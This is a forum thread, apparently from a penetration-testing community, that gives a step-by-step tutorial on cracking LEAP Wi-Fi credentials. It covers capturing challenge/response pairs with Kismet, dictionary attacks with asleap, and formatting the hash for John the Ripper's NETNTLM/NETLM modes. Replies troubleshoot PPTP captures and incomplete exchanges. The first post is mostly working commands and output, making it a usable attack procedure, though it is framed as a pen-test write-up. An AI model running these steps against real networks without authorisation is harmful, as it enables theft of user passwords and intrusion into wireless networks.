Page 1 of 2
Results 1 to 10 of 11

Thread: Tutorial : Cracking LEAP networks with ASLEAP and John

  1. #1
    williamc (Good friend of the forums) | Join Date: Feb 2010 | Location: Chico CA | Posts: 285

    Tutorial : Cracking LEAP networks with ASLEAP and John

    I recently performed a pen-test at a client site running LEAP. I thought I would document the process, not only to show others how, but for future reference.

    To start, we are assuming you've run kismet on the site and determined they are using LEAP. Kismet will create a .dump file in the local directory from which you are running the tool. Within this dump file are the LEAP challenge and responses. Depending on the amount of traffic, you will get either of these responses from ASLEAP:
    Code:
    asleap -r Kismet-Apr-29-2008-1.dump
    asleap 1.4 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
    Using the passive attack method.
    Closing pcap ...
    This one didn't have any challenge/responses. Now this one:
    Code:
    asleap -r Kismet-Apr-29-2008-1.dump
    asleap 1.4 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
    Using the passive attack method.
    
    Captured LEAP exchange information:
         username:     <removed>
         challenge:     d9b6a14378985feb
         response:      5540fd69295648c3db33e2217dbd3d0157f3a8f2c2ee1603
         hash bytes:   6fd3
    Now that we have a usable dump file, we can run a dictionary against the LEAP exchange. Prior to version 1.4 of asleap, you would have to use genkeys to generate a lookup file. Version 1.4 allows you to provide an ASCII dictionary directly with the -W option.
    Here's what we do:
    Code:
    asleap -r Kismet-Apr-29-2008-1.dump -W some_dictionary.txt
    Depending on the size of your dictionary, and the password policy of the client, you may get the NT hash for the user. With this you can easily crack it with plain-text.info rainbow tables.

    Worst case scenario, you get this response from asleap:
    Code:
    Could not find a matching NT hash. Try expanding your password list. I've given up. Sorry it didn't work out.
    Closing pcap ...
    This is where John the Ripper comes in. John can take the challenge/response from asleap and attempt to run a hybrid attack against it, brute forcing based upon your dictionary! Here's how:

    First, you must provide John a properly formatted challenge/response string. I used nano to do this. Open a blank document and copy the username, response, and challenge to the empty document using this format:
    username:::response::challenge

    Mine looked like this:
    Code:
    <removed>::::5540fd69295648c3db33e2217dbd3d0157f3a8f2c2ee1603:d9b6a14378985feb
    Save the file and run john, requesting the NETLM format, and give it your text file:
    Code:
    john --format=NETNTLM textfile.txt --wordlist=yourdictionary.txt --rules
    Loaded 1 password hash (LM C/R DES [netlm])
    John will make three passes against your input. It will run your dictionary, then your dictionary with appended characters, and finally a brute force. Press the space bar as john is running to see progress. The (1) (2) (3) will tell you which stage John is in. Stage three will take a long time! Your best bet is to have a comprehensive dictionary that can crack the password in stage 1 or 2. Also, knowing the client's password policy would be very helpful in determining the level of success you may have.

    Edit 7-15-08:
    To attempt LM hashes, change your input file to have three colons followed by two colons.
    Code:
    <removed>:::5540fd69295648c3db33e2217dbd3d0157f3a8f2c2ee1603::d9b6a14378985feb
    Your john command would be:
    Code:
    john --format=NETLM textfile.txt --wordlist=yourdictionary.txt --rules
    John stores the cracked hashes in the john.pot file for future reference. So, if you try to crack an account that was already successful, you won't get any results. That is due to the results being stored in the john.pot file.

    Hope this helps some of you out!

    William

  2. #2
    the_Fox200634 (Just burned his ISO) | Join Date: May 2008 | Posts: 8

    Please, can it be a video tutorial? Thanks.

  3. #3
    theprez98 (Moderator) | Join Date: Jan 2010 | Location: Maryland | Posts: 2,533

    Quote Originally Posted by the_Fox200634
    Please, can it be a video tutorial? Thanks.
    Are you not capable of reading?
    "\x74\x68\x65\x70\x72\x65\x7a\x39\x38";

  4. #4
    Archangel-Amael (Super Moderator) | Join Date: Jan 2010 | Location: Somewhere | Posts: 8,012

    Quote Originally Posted by theprez98
    Are you not capable of reading?
    Typing is sometimes a problem too.
    To be successful here you should read all of the following.
    Forum Rules
    Forum FAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  5. #5
    williamc (Good friend of the forums) | Join Date: Feb 2010 | Location: Chico CA | Posts: 285

    Updated with new information.

  6. #6
    Just burned his ISO | Join Date: Jun 2006 | Posts: 7

    Any chance of having more information about using rainbow tables (which ones) with this attack?

    Thanks a lot in advance

  7. #7
    Just burned his ISO | Join Date: Nov 2008 | Posts: 1

    So I've got something like that:
    Code:
    Captured PPTP exchange information:
            username:          username
            auth challenge:    d637b0ed524788f0cecf87e16ada26fe
            peer challenge:    18a84cbcab35d1778ee7fdca7ca4bdfd
            peer response:     90739dc4365b4d45cf8b7a1a8223e28a96ae23165da5cc7b
            challenge:         5ef0615b8b680e7e
            hash bytes:        b6dc
            Could not find a matching NT hash.  Try expanding your password list.
            I've given up.  Sorry it didn't work out.
    As you can see, it's MSCHAPv2. How can I crack it using John?
    Is it possible to do that using the method below?
    Thanks!

  8. #8
    williamc (Good friend of the forums) | Join Date: Feb 2010 | Location: Chico CA | Posts: 285

    You've captured a PPTP response, not a LEAP one. Both are implementations of MSChapV2, but PPTP adds an additional layer. Therefore, you cannot use John to crack it at this time and lose out on the brute force, hybrid attack. You can use the asleap method I outlined above, but it appears you already tried and were unsuccessful. Try to capture more challenge/responses and try again.

    William

  9. #9
    Just burned his ISO | Join Date: Jul 2006 | Posts: 7

    Good tut. What would cause the following output (not a full capture?):
    Code:
    asleap 2.2 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
    Captured LEAP exchange information:
         username:     < .. >
         challenge:    a4c275524df69c2b
         response:     11a6119c4e11aba55d8518e1c8c2980895ea489a7ba39d0b
    Could not recover last 2 bytes of hash from the
    challenge/response. Sorry it didn't work out.


    Cheers

  10. #10
    williamc (Good friend of the forums) | Join Date: Feb 2010 | Location: Chico CA | Posts: 285

    This is probably due to Kismet running in default channel hop mode. You only grabbed part of the exchange before Kismet jumped channels. Try scanning only the one channel, and preferably only the SSID. You should get the entire challenge/response and be able to continue.

    William

